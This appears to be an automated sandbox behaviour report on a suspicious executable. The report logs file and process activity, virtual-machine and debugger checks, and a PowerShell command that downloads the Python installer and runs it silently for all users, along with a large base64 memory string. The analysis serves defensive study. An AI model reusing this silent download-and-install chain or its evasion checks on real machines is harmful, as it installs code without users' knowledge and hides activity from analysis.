Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\packages\vcRuntimeAdditional_amd64Jump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532Jump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\NULLJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\packages\NULLJump to behavior
Source: 3Af7PybsUi.exe, 00000003.00000003.1859392660.000001EC89CD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}R
Source: 3Af7PybsUi.exe, 00000003.00000003.1345769900.000001EC83498000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1346812906.000001EC83498000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1344352884.000001EC83498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWlid %SystemRoot%\system32\mswsock.dllbject length.
Source: 3Af7PybsUi.exe, 00000003.00000003.1854777825.000001EC895CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
Source: powershell.exe, 00000004.00000002.1694351784.000002936D86B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF72629C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72629C44C
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B4503 mov eax, dword ptr fs:[00000030h]23_2_004B4503
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B8581 mov eax, dword ptr fs:[00000030h]23_2_004B8581
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B2790 GetProcessHeap,0_2_00007FF7262B2790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF72629C62C SetUnhandledExceptionFilter,0_2_00007FF72629C62C
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF72629BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF72629BBC0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF72629C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72629C44C
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7262A9924
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AE1B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_004AE1B8
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AE684 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_004AE684
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AE817 SetUnhandledExceptionFilter,23_2_004AE817
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B389A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_004B389A
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Users\user\Desktop\3Af7PybsUi.exe "C:\Users\user\Desktop\3Af7PybsUi.exe"Jump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exe "C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe "C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe" -burn.clean.room="C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" -burn.filehandle.attached=640 -burn.filehandle.self=680 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0Jump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe "C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{5461B88A-4125-4C2C-9E7F-F7CAF41CDAA7} {4FB5F196-D94A-42FD-9D71-D58BBB67B36C} 2908Jump to behavior
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=548 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Python311\python.exe "C:\Program Files\Python311\python.exe" -E -s -m ensurepip -U --default-pip
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filepath = \"c:\users\user~1\appdata\local\temp\tmpaf99aaqq.exe\" invoke-webrequest -uri $url -outfile $filepath "
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe "c:\windows\temp\{8525a9b8-faad-4c71-b074-f663031d8bee}\.cr\tmpaf99aaqq.exe" -burn.clean.room="c:\users\user~1\appdata\local\temp\tmpaf99aaqq.exe" -burn.filehandle.attached=640 -burn.filehandle.self=680 /quiet installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=548 /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filepath = \"c:\users\user~1\appdata\local\temp\tmpaf99aaqq.exe\" invoke-webrequest -uri $url -outfile $filepath "Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe "c:\windows\temp\{8525a9b8-faad-4c71-b074-f663031d8bee}\.cr\tmpaf99aaqq.exe" -burn.clean.room="c:\users\user~1\appdata\local\temp\tmpaf99aaqq.exe" -burn.filehandle.attached=640 -burn.filehandle.self=680 /quiet installallusers=1 prependpath=1 include_test=0Jump to behavior
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="c:\users\user\appdata\local\package cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=548 /quiet /burn.log.append "c:\users\user~1\appdata\local\temp\python 3.11.0 (64-bit)_20241014030941.log" installallusers=1 prependpath=1 include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C1BB9 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,23_2_004C1BB9
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C3ED2 AllocateAndInitializeSid,CheckTokenMembership,23_2_004C3ED2
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B8880 cpuid 0_2_00007FF7262B8880
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\PublicKey VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Crypto\Util VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\certifi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
